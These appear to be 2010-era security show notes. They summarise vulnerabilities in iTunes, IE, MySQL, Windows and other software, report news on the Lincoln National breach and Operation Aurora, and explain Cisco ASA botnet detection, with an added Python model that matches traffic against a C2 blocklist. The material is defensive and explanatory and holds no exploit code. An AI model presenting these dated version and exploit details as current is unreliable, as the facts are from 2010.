  1. Apple iTunes and QuickTime are subject to a buffer-overflow vulnerability because the applications fail to bounds-check user-supplied data before copying it into an insufficiently sized buffer. An attacker can exploit this issue to execute arbitrary code within the context of the affected application. Failed exploit attempts will result in a denial-of-service condition.  This issue affects iTunes 8.0.2.20 through 9.0.1.8 and QuickTime 7.3.4 through QuickTime X. Additional versions or applications that rely on the QuickTime library may also be affected.  PoCs are available.
  2. Google SketchUp is subject to a remote memory corruption vulnerability because the application fails to perform adequate boundary checks on user-supplied input. Attackers may exploit this issue to execute arbitrary code in the context of the application. Failed attacks will cause denial-of-service conditions. Google SketchUp 7.0.10247, 7.1.4871, and 7.1.6087 are vulnerable; other versions may also be affected. PoCs are available.
  3. MySQL is subject to a local privilege-escalation vulnerability. Local attackers can exploit this issue to gain elevated privileges on the affected computer. Versions prior to MySQL 5.1.41 are vulnerable. MySQL is subject to multiple remote denial-of-service vulnerabilities because it fails to handle certain SQL expressions. An attacker can exploit these issues to crash the application, denying access to legitimate users.  Versions prior to MySQL 5.0.88 and 5.1.41 are vulnerable. Example queries are available.
  4. Internet Explorer is subject to a remote code-execution vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the user running the browser. Successful exploits will compromise the application and possibly the computer. Failed attacks will cause denial-of-service conditions. This issue is being actively exploited in the wild in targeted attacks. A Metasploit exploit module is available.
  5. Ots Labs OtsTurntables is subject to a buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input. Attackers may be able to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in denial-of-service conditions. OtsTurntables 1.00.027 and 1.00.047 are vulnerable; other versions may also be affected. Exploits are available in the wild.
  6. Microsoft Windows is subject to a remote code-execution vulnerability that affects the Embedded OpenType font engine. An attacker can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Successful exploits may aid in the compromise of affected computers. Failed attempts may trigger a denial-of-service condition. A commercial proof of concept is available through VUPEN Security – Exploit and PoCs Service. This proof of concept is not otherwise publicly available or known to be circulating in the wild.
  7. Rockwell Automation is addressing these potential security issues in its MicroLogix product line. The affected software packages are 1761-Lxxxxx, 1762-Lxxxxx, 1763-Lxxxxx, 1764-Lxxxxx, and 1766-Lxxxxx. The recommended mitigation strategies are: restrict physical and electronic (network) access to the MicroLogix product to authorized users only, change the product's password periodically and frequently, and do not reuse old passwords.


News Items of Interest:

News item 1: http://www.darkreading.com/vulnerability_management/security/privacy/showArticle.jhtml?articleID=222301034&cid=RSSfeed

Lincoln National Corp. (LNC) last week disclosed a security vulnerability in its portfolio information system that could have compromised the account data of approximately 1.2 million customers.

In a disclosure letter (PDF) sent to the attorney general of New Hampshire Jan. 4, attorneys for the financial services firm revealed that a breach of the Lincoln portfolio information system had been reported to the Financial Industry Regulatory Authority (FINRA) by an unidentified source last August. The company was planning to issue notification to the affected customers on Jan. 6, the letter says.

News item 2: http://www.v3.co.uk/v3/news/2256195/sap-backs-increased-support

SAP has announced that it is changing its plans to shift all customers to a single service contract and has unveiled a tiered system that reduces customer costs. The company provoked a storm when it decided to shift all customers onto its pricey Enterprise Support package, so much so that last month it put the plans on hold until a review could be conducted. The new scheme announced today will create a Standard Support package priced at 18 per cent of the software licence base, compared to 22 per cent for the Enterprise package. The vendor is also to cancel proposed price increases for this year.

News item 3: http://www.fbi.gov/pressrel/pressrel10/earthquake011310.htm
The FBI today reminds Internet users who receive appeals to donate money in the aftermath of Tuesday’s earthquake in Haiti to apply a critical eye and do their due diligence before responding to those requests. Read the guidelines.

News item 4: http://news.techworld.com/security/3210307/cisco-asa-doesnt-support-internet-explorer-8/?olo=rss

It may be March before Cisco’s ASA security appliances support the latest version of Microsoft’s web browser, limiting what applications businesses can access over their SSL VPN connections. Incompatibility with Microsoft’s Internet Explorer 8 means one of the ASA’s SSL VPN options won’t work until then, leaving a second option that only supports applications with web interfaces or those that can be readily made web compliant.

News item 5: Here is a list of FBI or private designations for widespread Chinese attacks on US corporations.

Moonlight Maze – 1999

Titan Rain – 2003 – 2005

GhostNet – March 2009

Operation “Aurora” – December 2009


News item 6: http://www.washingtonpost.com/wp-dyn/content/article/2010/01/13/AR2010011300359.html

Juniper Networks and Symantec said Thursday that they were investigating a widespread cyber-espionage incident that has hit dozens of technology companies, including Google and Adobe.

Sources familiar with the situation say that 34 companies, most of them large Fortune 500 names, were hit by a sophisticated cyber-attack, first uncovered by Google last month. The attackers used a previously unknown “zero-day” attack on Internet Explorer, and possibly other techniques, to break into company networks and steal sensitive information.

The Washington Post reports that Yahoo, Dow Chemical and Northrop Grumman were also attacked. Juniper and Symantec both acknowledged that they were investigating incidents, but stopped short of saying they had been hacked or of providing any details.

Technical Segment:

http://www.cisco.com/en/US/solutions/collateral/ns340/ns394/ns171/ns441/networking_solutions_whitepaper0900aecd8072a537.html

Are there botnet-controlled hosts on your network? Are your hosts infected with malware or spyware that is trying to "phone home"? How would you know? One way to find out is to employ the Cisco ASA's new Layer 4 Traffic Monitoring (L4TM) feature. L4TM detects infected clients by tracking rogue "phone-home" traffic.
The Cisco ASA Layer 4 Traffic Monitor feature is designed to detect command-and-control and data-upload traffic from bots, malware, and spyware flowing through the ASA back to their "HQ". To make this detection possible using an ASA, Cisco leveraged technology already present in its IronPort Web Security Appliance (WSA) product. Let's look at how botnet infection typically happens and how the Cisco ASA's new feature can help detect it.

Botnet Infection Process:
1) A client somehow gets infected with malware, spyware, or another botnet-style exploit. By and large these infections happen via websites or email.
2) The infected client then communicates with one or more command-and-control sites on the Internet.
3) Depending on the type of exploit, the client then launches some type of attack. Common examples are denial-of-service attacks, spam relaying, adware infection, identity theft, keyboard logging, data theft, click fraud, upload of confidential data, reconnaissance, and many others. The commonality is that all of these need to talk back to their "mothership" in some manner to be worth anything to the attacker.

Layer 4 Traffic Monitor Botnet detection process:
1) Cisco ASA is configured to retrieve and install the Cisco Botnet database from Ironport.com. The ASA will then dynamically check every 60 minutes for updates to the Botnet database.
2) ASA L4TM feature compares the destination addresses flowing through its interfaces with those in its Botnet database. It is looking for matches which would indicate the destination IP is malicious.
3) When a match is encountered, an alert is sent to ASDM and syslog with the details of the source IP and the malicious destination IP.
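To make the three-step detection process concrete, here is an added Python model of the lookup-and-alert step (this is illustration code written for these notes, not Cisco's implementation): a destination list with a last-refresh time, a hourly staleness check mirroring the 60-minute update cadence, and a monitor that emits syslog-style alerts naming the source and the listed destination. The list entries, flow records and timestamps are constructed sample data.

```python
# Added example (not Cisco code): a minimal model of the L4TM lookup step.
# Blocklist entries, flow records and timestamps below are constructed.
from datetime import datetime, timedelta
import ipaddress

UPDATE_INTERVAL = timedelta(minutes=60)  # refresh cadence given in the show notes

class BotnetDatabase:
    """Listed C2 destinations (hosts or CIDR blocks) plus the time of the last refresh."""
    def __init__(self, lines, fetched_at):
        self.networks = [ipaddress.ip_network(l.strip(), strict=False)
                         for l in lines if l.strip() and not l.startswith("#")]
        self.last_updated = fetched_at

    def is_stale(self, now):
        # The ASA re-checks hourly; a list older than that should not be trusted silently.
        return now - self.last_updated > UPDATE_INTERVAL

    def match(self, dst_ip):
        # Return the list entry that contains dst_ip, or None if it is not listed.
        addr = ipaddress.ip_address(dst_ip)
        return next((str(n) for n in self.networks if addr in n), None)

def monitor(flows, db, now):
    """Return syslog-style alert lines for flows whose destination is listed.
    flows: (src_ip, dst_ip, dst_port) tuples as seen crossing the firewall."""
    alerts = []
    if db.is_stale(now):
        alerts.append(f"{now:%b %d %H:%M:%S} WARNING botnet database stale "
                      f"(last update {db.last_updated:%Y-%m-%d %H:%M})")
    for src, dst, port in flows:
        hit = db.match(dst)
        if hit:  # only the destination is checked, exactly as the segment describes
            alerts.append(f"{now:%b %d %H:%M:%S} ALERT phone-home src={src} "
                          f"dst={dst}:{port} list_entry={hit}")
    return alerts

# Constructed sample data using RFC 5737 documentation ranges, not real indicators.
SAMPLE_DB = BotnetDatabase(["# constructed feed", "198.51.100.7", "203.0.113.0/24"],
                           fetched_at=datetime(2010, 1, 29, 9, 0))
SAMPLE_FLOWS = [("10.0.0.5", "192.0.2.10", 443),      # not listed
                ("10.0.0.8", "203.0.113.44", 8080),   # inside a listed /24
                ("10.0.0.9", "198.51.100.7", 80)]     # exact listed host

def run_sample(now=datetime(2010, 1, 29, 9, 30)):
    return monitor(SAMPLE_FLOWS, SAMPLE_DB, now)

if __name__ == "__main__":
    print("\n".join(run_sample()))
```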